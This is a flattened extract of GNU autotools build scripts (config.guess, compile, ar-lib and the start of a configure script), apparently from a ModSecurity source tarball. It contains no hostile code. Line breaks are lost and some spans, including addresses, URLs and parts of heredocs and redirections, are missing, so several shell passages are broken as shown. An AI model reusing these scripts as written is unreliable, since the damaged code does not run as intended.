then echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabi else echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabihf fi fi exit ;; avr32*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; cris:Linux:*:*) echo "$UNAME_MACHINE"-axis-linux-"$LIBC" exit ;; crisv32:Linux:*:*) echo "$UNAME_MACHINE"-axis-linux-"$LIBC" exit ;; e2k:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; frv:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; hexagon:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; i*86:Linux:*:*) echo "$UNAME_MACHINE"-pc-linux-"$LIBC" exit ;; ia64:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; k1om:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; m32r*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; m68*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; mips:Linux:*:* | mips64:Linux:*:*) eval "$set_cc_for_build" sed 's/^ //' << EOF > "$dummy.c" #undef CPU #undef ${UNAME_MACHINE} #undef ${UNAME_MACHINE}el #if defined(__MIPSEL__) || defined(__MIPSEL) || defined(_MIPSEL) || defined(MIPSEL) CPU=${UNAME_MACHINE}el #else #if defined(__MIPSEB__) || defined(__MIPSEB) || defined(_MIPSEB) || defined(MIPSEB) CPU=${UNAME_MACHINE} #else CPU= #endif #endif EOF eval "`$CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^CPU'`" test "x$CPU" != x && { echo "$CPU-unknown-linux-$LIBC"; exit; } ;; mips64el:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; openrisc*:Linux:*:*) echo or1k-unknown-linux-"$LIBC" exit ;; or32:Linux:*:* | or1k*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; padre:Linux:*:*) echo sparc-unknown-linux-"$LIBC" exit ;; parisc64:Linux:*:* | hppa64:Linux:*:*) echo hppa64-unknown-linux-"$LIBC" exit ;; parisc:Linux:*:* | hppa:Linux:*:*) # Look for CPU level case `grep '^cpu[^a-z]*:' /proc/cpuinfo 2>/dev/null | cut -d' ' -f2` in PA7*) echo hppa1.1-unknown-linux-"$LIBC" ;; PA8*) echo hppa2.0-unknown-linux-"$LIBC" ;; *) echo hppa-unknown-linux-"$LIBC" ;; esac exit ;; ppc64:Linux:*:*) echo powerpc64-unknown-linux-"$LIBC" exit ;; ppc:Linux:*:*) echo powerpc-unknown-linux-"$LIBC" exit ;; ppc64le:Linux:*:*) echo powerpc64le-unknown-linux-"$LIBC" exit ;; ppcle:Linux:*:*) echo powerpcle-unknown-linux-"$LIBC" exit ;; riscv32:Linux:*:* | riscv64:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; s390:Linux:*:* | s390x:Linux:*:*) echo "$UNAME_MACHINE"-ibm-linux-"$LIBC" exit ;; sh64*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; sh*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; sparc:Linux:*:* | sparc64:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; tile*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; vax:Linux:*:*) echo "$UNAME_MACHINE"-dec-linux-"$LIBC" exit ;; x86_64:Linux:*:*) echo "$UNAME_MACHINE"-pc-linux-"$LIBC" exit ;; xtensa*:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; i*86:DYNIX/ptx:4*:*) # ptx 4.0 does uname -s correctly, with DYNIX/ptx in there. # earlier versions are messed up and put the nodename in both # sysname and nodename. echo i386-sequent-sysv4 exit ;; i*86:UNIX_SV:4.2MP:2.*) # Unixware is an offshoot of SVR4, but it has its own version # number series starting with 2... # I am not positive that other SVR4 systems won't match this, # I just have to hope. -- rms. # Use sysv4.2uw... so that sysv4* matches it. echo "$UNAME_MACHINE"-pc-sysv4.2uw"$UNAME_VERSION" exit ;; i*86:OS/2:*:*) # If we were able to find `uname', then EMX Unix compatibility # is probably installed. echo "$UNAME_MACHINE"-pc-os2-emx exit ;; i*86:XTS-300:*:STOP) echo "$UNAME_MACHINE"-unknown-stop exit ;; i*86:atheos:*:*) echo "$UNAME_MACHINE"-unknown-atheos exit ;; i*86:syllable:*:*) echo "$UNAME_MACHINE"-pc-syllable exit ;; i*86:LynxOS:2.*:* | i*86:LynxOS:3.[01]*:* | i*86:LynxOS:4.[02]*:*) echo i386-unknown-lynxos"$UNAME_RELEASE" exit ;; i*86:*DOS:*:*) echo "$UNAME_MACHINE"-pc-msdosdjgpp exit ;; i*86:*:4.*:*) UNAME_REL=`echo "$UNAME_RELEASE" | sed 's/\/MP$//'` if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then echo "$UNAME_MACHINE"-univel-sysv"$UNAME_REL" else echo "$UNAME_MACHINE"-pc-sysv"$UNAME_REL" fi exit ;; i*86:*:5:[678]*) # UnixWare 7.x, OpenUNIX and OpenServer 6. case `/bin/uname -X | grep "^Machine"` in *486*) UNAME_MACHINE=i486 ;; *Pentium) UNAME_MACHINE=i586 ;; *Pent*|*Celeron) UNAME_MACHINE=i686 ;; esac echo "$UNAME_MACHINE-unknown-sysv${UNAME_RELEASE}${UNAME_SYSTEM}{$UNAME_VERSION}" exit ;; i*86:*:3.2:*) if test -f /usr/options/cb.name; then UNAME_REL=`sed -n 's/.*Version //p' /dev/null >/dev/null ; then UNAME_REL=`(/bin/uname -X|grep Release|sed -e 's/.*= //')` (/bin/uname -X|grep i80486 >/dev/null) && UNAME_MACHINE=i486 (/bin/uname -X|grep '^Machine.*Pentium' >/dev/null) \ && UNAME_MACHINE=i586 (/bin/uname -X|grep '^Machine.*Pent *II' >/dev/null) \ && UNAME_MACHINE=i686 (/bin/uname -X|grep '^Machine.*Pentium Pro' >/dev/null) \ && UNAME_MACHINE=i686 echo "$UNAME_MACHINE"-pc-sco"$UNAME_REL" else echo "$UNAME_MACHINE"-pc-sysv32 fi exit ;; pc:*:*:*) # Left here for compatibility: # uname -m prints for DJGPP always 'pc', but it prints nothing about # the processor, so we play safe by assuming i586. # Note: whatever this is, it MUST be the same as what config.sub # prints for the "djgpp" host, or else GDB configure will decide that # this is a cross-build. echo i586-pc-msdosdjgpp exit ;; Intel:Mach:3*:*) echo i386-pc-mach3 exit ;; paragon:*:*:*) echo i860-intel-osf1 exit ;; i860:*:4.*:*) # i860-SVR4 if grep Stardent /usr/include/sys/uadmin.h >/dev/null 2>&1 ; then echo i860-stardent-sysv"$UNAME_RELEASE" # Stardent Vistra i860-SVR4 else # Add other i860-SVR4 vendors below as they are discovered. echo i860-unknown-sysv"$UNAME_RELEASE" # Unknown i860-SVR4 fi exit ;; mini*:CTIX:SYS*5:*) # "miniframe" echo m68010-convergent-sysv exit ;; mc68k:UNIX:SYSTEM5:3.51m) echo m68k-convergent-sysv exit ;; M680?0:D-NIX:5.3:*) echo m68k-diab-dnix exit ;; M68*:*:R3V[5678]*:*) test -r /sysV68 && { echo 'm68k-motorola-sysv'; exit; } ;; 3[345]??:*:4.0:3.0 | 3[34]??A:*:4.0:3.0 | 3[34]??,*:*:4.0:3.0 | 3[34]??/*:*:4.0:3.0 | 4400:*:4.0:3.0 | 4850:*:4.0:3.0 | SKA40:*:4.0:3.0 | SDS2:*:4.0:3.0 | SHG2:*:4.0:3.0 | S7501*:*:4.0:3.0) OS_REL='' test -r /etc/.relid \ && OS_REL=.`sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid` /bin/uname -p 2>/dev/null | grep 86 >/dev/null \ && { echo i486-ncr-sysv4.3"$OS_REL"; exit; } /bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \ && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;; 3[34]??:*:4.0:* | 3[34]??,*:*:4.0:*) /bin/uname -p 2>/dev/null | grep 86 >/dev/null \ && { echo i486-ncr-sysv4; exit; } ;; NCR*:*:4.2:* | MPRAS*:*:4.2:*) OS_REL='.3' test -r /etc/.relid \ && OS_REL=.`sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid` /bin/uname -p 2>/dev/null | grep 86 >/dev/null \ && { echo i486-ncr-sysv4.3"$OS_REL"; exit; } /bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \ && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } /bin/uname -p 2>/dev/null | /bin/grep pteron >/dev/null \ && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;; m68*:LynxOS:2.*:* | m68*:LynxOS:3.0*:*) echo m68k-unknown-lynxos"$UNAME_RELEASE" exit ;; mc68030:UNIX_System_V:4.*:*) echo m68k-atari-sysv4 exit ;; TSUNAMI:LynxOS:2.*:*) echo sparc-unknown-lynxos"$UNAME_RELEASE" exit ;; rs6000:LynxOS:2.*:*) echo rs6000-unknown-lynxos"$UNAME_RELEASE" exit ;; PowerPC:LynxOS:2.*:* | PowerPC:LynxOS:3.[01]*:* | PowerPC:LynxOS:4.[02]*:*) echo powerpc-unknown-lynxos"$UNAME_RELEASE" exit ;; SM[BE]S:UNIX_SV:*:*) echo mips-dde-sysv"$UNAME_RELEASE" exit ;; RM*:ReliantUNIX-*:*:*) echo mips-sni-sysv4 exit ;; RM*:SINIX-*:*:*) echo mips-sni-sysv4 exit ;; *:SINIX-*:*:*) if uname -p 2>/dev/null >/dev/null ; then UNAME_MACHINE=`(uname -p) 2>/dev/null` echo "$UNAME_MACHINE"-sni-sysv4 else echo ns32k-sni-sysv fi exit ;; PENTIUM:*:4.0*:*) # Unisys `ClearPath HMP IX 4000' SVR4/MP effort # says echo i586-unisys-sysv4 exit ;; *:UNIX_System_V:4*:FTX*) # From Gerald Hewes . # How about differentiating between stratus architectures? -djm echo hppa1.1-stratus-sysv4 exit ;; *:*:*:FTX*) # From seanf@swdc.stratus.com. echo i860-stratus-sysv4 exit ;; i*86:VOS:*:*) # From Paul.Green@stratus.com. echo "$UNAME_MACHINE"-stratus-vos exit ;; *:VOS:*:*) # From Paul.Green@stratus.com. echo hppa1.1-stratus-vos exit ;; mc68*:A/UX:*:*) echo m68k-apple-aux"$UNAME_RELEASE" exit ;; news*:NEWS-OS:6*:*) echo mips-sony-newsos6 exit ;; R[34]000:*System_V*:*:* | R4000:UNIX_SYSV:*:* | R*000:UNIX_SV:*:*) if [ -d /usr/nec ]; then echo mips-nec-sysv"$UNAME_RELEASE" else echo mips-unknown-sysv"$UNAME_RELEASE" fi exit ;; BeBox:BeOS:*:*) # BeOS running on hardware made by Be, PPC only. echo powerpc-be-beos exit ;; BeMac:BeOS:*:*) # BeOS running on Mac or Mac clone, PPC only. echo powerpc-apple-beos exit ;; BePC:BeOS:*:*) # BeOS running on Intel PC compatible. echo i586-pc-beos exit ;; BePC:Haiku:*:*) # Haiku running on Intel PC compatible. echo i586-pc-haiku exit ;; x86_64:Haiku:*:*) echo x86_64-unknown-haiku exit ;; SX-4:SUPER-UX:*:*) echo sx4-nec-superux"$UNAME_RELEASE" exit ;; SX-5:SUPER-UX:*:*) echo sx5-nec-superux"$UNAME_RELEASE" exit ;; SX-6:SUPER-UX:*:*) echo sx6-nec-superux"$UNAME_RELEASE" exit ;; SX-7:SUPER-UX:*:*) echo sx7-nec-superux"$UNAME_RELEASE" exit ;; SX-8:SUPER-UX:*:*) echo sx8-nec-superux"$UNAME_RELEASE" exit ;; SX-8R:SUPER-UX:*:*) echo sx8r-nec-superux"$UNAME_RELEASE" exit ;; SX-ACE:SUPER-UX:*:*) echo sxace-nec-superux"$UNAME_RELEASE" exit ;; Power*:Rhapsody:*:*) echo powerpc-apple-rhapsody"$UNAME_RELEASE" exit ;; *:Rhapsody:*:*) echo "$UNAME_MACHINE"-apple-rhapsody"$UNAME_RELEASE" exit ;; *:Darwin:*:*) UNAME_PROCESSOR=`uname -p` || UNAME_PROCESSOR=unknown eval "$set_cc_for_build" if test "$UNAME_PROCESSOR" = unknown ; then UNAME_PROCESSOR=powerpc fi if test "`echo "$UNAME_RELEASE" | sed -e 's/\..*//'`" -le 10 ; then if [ "$CC_FOR_BUILD" != no_compiler_found ]; then if (echo '#ifdef __LP64__'; echo IS_64BIT_ARCH; echo '#endif') | \ (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \ grep IS_64BIT_ARCH >/dev/null then case $UNAME_PROCESSOR in i386) UNAME_PROCESSOR=x86_64 ;; powerpc) UNAME_PROCESSOR=powerpc64 ;; esac fi # On 10.4-10.6 one might compile for PowerPC via gcc -arch ppc if (echo '#ifdef __POWERPC__'; echo IS_PPC; echo '#endif') | \ (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \ grep IS_PPC >/dev/null then UNAME_PROCESSOR=powerpc fi fi elif test "$UNAME_PROCESSOR" = i386 ; then # Avoid executing cc on OS X 10.9, as it ships with a stub # that puts up a graphical alert prompting to install # developer tools. Any system running Mac OS X 10.7 or # later (Darwin 11 and later) is required to have a 64-bit # processor. This is not true of the ARM version of Darwin # that Apple uses in portable devices. UNAME_PROCESSOR=x86_64 fi echo "$UNAME_PROCESSOR"-apple-darwin"$UNAME_RELEASE" exit ;; *:procnto*:*:* | *:QNX:[0123456789]*:*) UNAME_PROCESSOR=`uname -p` if test "$UNAME_PROCESSOR" = x86; then UNAME_PROCESSOR=i386 UNAME_MACHINE=pc fi echo "$UNAME_PROCESSOR"-"$UNAME_MACHINE"-nto-qnx"$UNAME_RELEASE" exit ;; *:QNX:*:4*) echo i386-pc-qnx exit ;; NEO-*:NONSTOP_KERNEL:*:*) echo neo-tandem-nsk"$UNAME_RELEASE" exit ;; NSE-*:NONSTOP_KERNEL:*:*) echo nse-tandem-nsk"$UNAME_RELEASE" exit ;; NSR-*:NONSTOP_KERNEL:*:*) echo nsr-tandem-nsk"$UNAME_RELEASE" exit ;; NSV-*:NONSTOP_KERNEL:*:*) echo nsv-tandem-nsk"$UNAME_RELEASE" exit ;; NSX-*:NONSTOP_KERNEL:*:*) echo nsx-tandem-nsk"$UNAME_RELEASE" exit ;; *:NonStop-UX:*:*) echo mips-compaq-nonstopux exit ;; BS2000:POSIX*:*:*) echo bs2000-siemens-sysv exit ;; DS/*:UNIX_System_V:*:*) echo "$UNAME_MACHINE"-"$UNAME_SYSTEM"-"$UNAME_RELEASE" exit ;; *:Plan9:*:*) # "uname -m" is not consistent, so use $cputype instead. 386 # is converted to i386 for consistency with other x86 # operating systems. if test "$cputype" = 386; then UNAME_MACHINE=i386 else UNAME_MACHINE="$cputype" fi echo "$UNAME_MACHINE"-unknown-plan9 exit ;; *:TOPS-10:*:*) echo pdp10-unknown-tops10 exit ;; *:TENEX:*:*) echo pdp10-unknown-tenex exit ;; KS10:TOPS-20:*:* | KL10:TOPS-20:*:* | TYPE4:TOPS-20:*:*) echo pdp10-dec-tops20 exit ;; XKL-1:TOPS-20:*:* | TYPE5:TOPS-20:*:*) echo pdp10-xkl-tops20 exit ;; *:TOPS-20:*:*) echo pdp10-unknown-tops20 exit ;; *:ITS:*:*) echo pdp10-unknown-its exit ;; SEI:*:*:SEIUX) echo mips-sei-seiux"$UNAME_RELEASE" exit ;; *:DragonFly:*:*) echo "$UNAME_MACHINE"-unknown-dragonfly"`echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`" exit ;; *:*VMS:*:*) UNAME_MACHINE=`(uname -p) 2>/dev/null` case "$UNAME_MACHINE" in A*) echo alpha-dec-vms ; exit ;; I*) echo ia64-dec-vms ; exit ;; V*) echo vax-dec-vms ; exit ;; esac ;; *:XENIX:*:SysV) echo i386-pc-xenix exit ;; i*86:skyos:*:*) echo "$UNAME_MACHINE"-pc-skyos"`echo "$UNAME_RELEASE" | sed -e 's/ .*$//'`" exit ;; i*86:rdos:*:*) echo "$UNAME_MACHINE"-pc-rdos exit ;; i*86:AROS:*:*) echo "$UNAME_MACHINE"-pc-aros exit ;; x86_64:VMkernel:*:*) echo "$UNAME_MACHINE"-unknown-esx exit ;; amd64:Isilon\ OneFS:*:*) echo x86_64-unknown-onefs exit ;; esac echo "$0: unable to guess system type" >&2 case "$UNAME_MACHINE:$UNAME_SYSTEM" in mips:Linux | mips64:Linux) # If we got here on MIPS GNU/Linux, output extra information. cat >&2 <&2 </dev/null || echo unknown` uname -r = `(uname -r) 2>/dev/null || echo unknown` uname -s = `(uname -s) 2>/dev/null || echo unknown` uname -v = `(uname -v) 2>/dev/null || echo unknown` /usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null` /bin/uname -X = `(/bin/uname -X) 2>/dev/null` hostinfo = `(hostinfo) 2>/dev/null` /bin/universe = `(/bin/universe) 2>/dev/null` /usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null` /bin/arch = `(/bin/arch) 2>/dev/null` /usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null` /usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null` UNAME_MACHINE = "$UNAME_MACHINE" UNAME_RELEASE = "$UNAME_RELEASE" UNAME_SYSTEM = "$UNAME_SYSTEM" UNAME_VERSION = "$UNAME_VERSION" EOF exit 1 # Local variables: # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "timestamp='" # time-stamp-format: "%:y-%02m-%02d" # time-stamp-end: "'" # End: modsecurity-v3.0.4/compile0000755000175000017500000001632713607066346016107 0ustar zimmerlezimmerle#! /bin/sh # Wrapper for compilers which do not understand '-c -o'. scriptversion=2018-03-07.03; # UTC # Copyright (C) 1999-2018 Free Software Foundation, Inc. # Written by Tom Tromey . # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. # This file is maintained in Automake, please report # bugs to or send patches to # . nl=' ' # We need space, tab and new line, in precisely that order. Quoting is # there to prevent tools from complaining about whitespace usage. IFS=" "" $nl" file_conv= # func_file_conv build_file lazy # Convert a $build file to $host form and store it in $file # Currently only supports Windows hosts. If the determined conversion # type is listed in (the comma separated) LAZY, no conversion will # take place. func_file_conv () { file=$1 case $file in / | /[!/]*) # absolute file, and not a UNC file if test -z "$file_conv"; then # lazily determine how to convert abs files case `uname -s` in MINGW*) file_conv=mingw ;; CYGWIN*) file_conv=cygwin ;; *) file_conv=wine ;; esac fi case $file_conv/,$2, in *,$file_conv,*) ;; mingw/*) file=`cmd //C echo "$file " | sed -e 's/"\(.*\) " *$/\1/'` ;; cygwin/*) file=`cygpath -m "$file" || echo "$file"` ;; wine/*) file=`winepath -w "$file" || echo "$file"` ;; esac ;; esac } # func_cl_dashL linkdir # Make cl look for libraries in LINKDIR func_cl_dashL () { func_file_conv "$1" if test -z "$lib_path"; then lib_path=$file else lib_path="$lib_path;$file" fi linker_opts="$linker_opts -LIBPATH:$file" } # func_cl_dashl library # Do a library search-path lookup for cl func_cl_dashl () { lib=$1 found=no save_IFS=$IFS IFS=';' for dir in $lib_path $LIB do IFS=$save_IFS if $shared && test -f "$dir/$lib.dll.lib"; then found=yes lib=$dir/$lib.dll.lib break fi if test -f "$dir/$lib.lib"; then found=yes lib=$dir/$lib.lib break fi if test -f "$dir/lib$lib.a"; then found=yes lib=$dir/lib$lib.a break fi done IFS=$save_IFS if test "$found" != yes; then lib=$lib.lib fi } # func_cl_wrapper cl arg... # Adjust compile command to suit cl func_cl_wrapper () { # Assume a capable shell lib_path= shared=: linker_opts= for arg do if test -n "$eat"; then eat= else case $1 in -o) # configure might choose to run compile as 'compile cc -o foo foo.c'. eat=1 case $2 in *.o | *.[oO][bB][jJ]) func_file_conv "$2" set x "$@" -Fo"$file" shift ;; *) func_file_conv "$2" set x "$@" -Fe"$file" shift ;; esac ;; -I) eat=1 func_file_conv "$2" mingw set x "$@" -I"$file" shift ;; -I*) func_file_conv "${1#-I}" mingw set x "$@" -I"$file" shift ;; -l) eat=1 func_cl_dashl "$2" set x "$@" "$lib" shift ;; -l*) func_cl_dashl "${1#-l}" set x "$@" "$lib" shift ;; -L) eat=1 func_cl_dashL "$2" ;; -L*) func_cl_dashL "${1#-L}" ;; -static) shared=false ;; -Wl,*) arg=${1#-Wl,} save_ifs="$IFS"; IFS=',' for flag in $arg; do IFS="$save_ifs" linker_opts="$linker_opts $flag" done IFS="$save_ifs" ;; -Xlinker) eat=1 linker_opts="$linker_opts $2" ;; -*) set x "$@" "$1" shift ;; *.cc | *.CC | *.cxx | *.CXX | *.[cC]++) func_file_conv "$1" set x "$@" -Tp"$file" shift ;; *.c | *.cpp | *.CPP | *.lib | *.LIB | *.Lib | *.OBJ | *.obj | *.[oO]) func_file_conv "$1" mingw set x "$@" "$file" shift ;; *) set x "$@" "$1" shift ;; esac fi shift done if test -n "$linker_opts"; then linker_opts="-link$linker_opts" fi exec "$@" $linker_opts exit 1 } eat= case $1 in '') echo "$0: No command. Try '$0 --help' for more information." 1>&2 exit 1; ;; -h | --h*) cat <<\EOF Usage: compile [--help] [--version] PROGRAM [ARGS] Wrapper for compilers which do not understand '-c -o'. Remove '-o dest.o' from ARGS, run PROGRAM with the remaining arguments, and rename the output as expected. If you are trying to build a whole package this is not the right script to run: please start by reading the file 'INSTALL'. Report bugs to . EOF exit $? ;; -v | --v*) echo "compile $scriptversion" exit $? ;; cl | *[/\\]cl | cl.exe | *[/\\]cl.exe | \ icl | *[/\\]icl | icl.exe | *[/\\]icl.exe ) func_cl_wrapper "$@" # Doesn't return... ;; esac ofile= cfile= for arg do if test -n "$eat"; then eat= else case $1 in -o) # configure might choose to run compile as 'compile cc -o foo foo.c'. # So we strip '-o arg' only if arg is an object. eat=1 case $2 in *.o | *.obj) ofile=$2 ;; *) set x "$@" -o "$2" shift ;; esac ;; *.c) cfile=$1 set x "$@" "$1" shift ;; *) set x "$@" "$1" shift ;; esac fi shift done if test -z "$ofile" || test -z "$cfile"; then # If no '-o' option was seen then we might have been invoked from a # pattern rule where we don't need one. That is ok -- this is a # normal compilation that the losing compiler can handle. If no # '.c' file was seen then we are probably linking. That is also # ok. exec "$@" fi # Name of file we expect compiler to create. cofile=`echo "$cfile" | sed 's|^.*[\\/]||; s|^[a-zA-Z]:||; s/\.c$/.o/'` # Create the lock directory. # Note: use '[/\\:.-]' here to ensure that we don't use the same name # that we are using for the .o file. Also, base the name on the expected # object file name, since that is what matters with a parallel build. lockdir=`echo "$cofile" | sed -e 's|[/\\:.-]|_|g'`.d while true; do if mkdir "$lockdir" >/dev/null 2>&1; then break fi sleep 1 done # FIXME: race condition here if user kills between mkdir and trap. trap "rmdir '$lockdir'; exit 1" 1 2 15 # Run the compile. "$@" ret=$? if test -f "$cofile"; then test "$cofile" = "$ofile" || mv "$cofile" "$ofile" elif test -f "${cofile}bj"; then test "${cofile}bj" = "$ofile" || mv "${cofile}bj" "$ofile" fi rmdir "$lockdir" exit $ret # Local Variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/ar-lib0000755000175000017500000001330313607066346015614 0ustar zimmerlezimmerle#! /bin/sh # Wrapper for Microsoft lib.exe me=ar-lib scriptversion=2012-03-01.08; # UTC # Copyright (C) 2010-2018 Free Software Foundation, Inc. # Written by Peter Rosin . # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. # This file is maintained in Automake, please report # bugs to or send patches to # . # func_error message func_error () { echo "$me: $1" 1>&2 exit 1 } file_conv= # func_file_conv build_file # Convert a $build file to $host form and store it in $file # Currently only supports Windows hosts. func_file_conv () { file=$1 case $file in / | /[!/]*) # absolute file, and not a UNC file if test -z "$file_conv"; then # lazily determine how to convert abs files case `uname -s` in MINGW*) file_conv=mingw ;; CYGWIN*) file_conv=cygwin ;; *) file_conv=wine ;; esac fi case $file_conv in mingw) file=`cmd //C echo "$file " | sed -e 's/"\(.*\) " *$/\1/'` ;; cygwin) file=`cygpath -m "$file" || echo "$file"` ;; wine) file=`winepath -w "$file" || echo "$file"` ;; esac ;; esac } # func_at_file at_file operation archive # Iterate over all members in AT_FILE performing OPERATION on ARCHIVE # for each of them. # When interpreting the content of the @FILE, do NOT use func_file_conv, # since the user would need to supply preconverted file names to # binutils ar, at least for MinGW. func_at_file () { operation=$2 archive=$3 at_file_contents=`cat "$1"` eval set x "$at_file_contents" shift for member do $AR -NOLOGO $operation:"$member" "$archive" || exit $? done } case $1 in '') func_error "no command. Try '$0 --help' for more information." ;; -h | --h*) cat <. # # # Copyright (C) 1992-1996, 1998-2012 Free Software Foundation, Inc. # # # This configure script is free software; the Free Software Foundation # gives unlimited permission to copy, distribute and modify it. ## -------------------- ## ## M4sh Initialization. ## ## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else case `(set -o) 2>/dev/null` in #( *posix*) : set -o posix ;; #( *) : ;; esac fi as_nl=' ' export as_nl # Printing a long string crashes Solaris 7 /usr/bin/printf. as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo # Prefer a ksh shell builtin over an external printf program on Solaris, # but without wasting forks for bash or zsh. if test -z "$BASH_VERSION$ZSH_VERSION" \ && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then as_echo='print -r --' as_echo_n='print -rn --' elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then as_echo='printf %s\n' as_echo_n='printf %s' else if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' as_echo_n='/usr/ucb/echo -n' else as_echo_body='eval expr "X$1" : "X\\(.*\\)"' as_echo_n_body='eval arg=$1; case $arg in #( *"$as_nl"*) expr "X$arg" : "X\\(.*\\)$as_nl"; arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; esac; expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" ' export as_echo_n_body as_echo_n='sh -c $as_echo_n_body as_echo' fi export as_echo_body as_echo='sh -c $as_echo_body as_echo' fi # The user is always right. if test "${PATH_SEPARATOR+set}" != set; then PATH_SEPARATOR=: (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || PATH_SEPARATOR=';' } fi # IFS # We need space, tab and new line, in precisely that order. Quoting is # there to prevent editors from complaining about space-tab. # (If _AS_PATH_WALK were called with IFS unset, it would disable word # splitting by setting IFS to empty value.) IFS=" "" $as_nl" # Find who we are. Look in the path if we contain no directory separator. as_myself= case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break done IFS=$as_save_IFS ;; esac # We did not find ourselves, most probably we were run as `sh COMMAND' # in which case we are not to be found in the path. if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 exit 1 fi # Unset variables that we do not need and which cause bugs (e.g. in # pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" # suppresses any "Segmentation fault" message there. '((' could # trigger a bug in pdksh 5.2.14. for as_var in BASH_ENV ENV MAIL MAILPATH do eval test x\${$as_var+set} = xset \ && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done PS1='$ ' PS2='> ' PS4='+ ' # NLS nuisances. LC_ALL=C export LC_ALL LANGUAGE=C export LANGUAGE # CDPATH. (unset CDPATH) >/dev/null 2>&1 && unset CDPATH # Use a proper internal environment variable to ensure we don't fall # into an infinite loop, continuously re-executing ourselves. if test x"${_as_can_reexec}" != xno && test "x$CONFIG_SHELL" != x; then 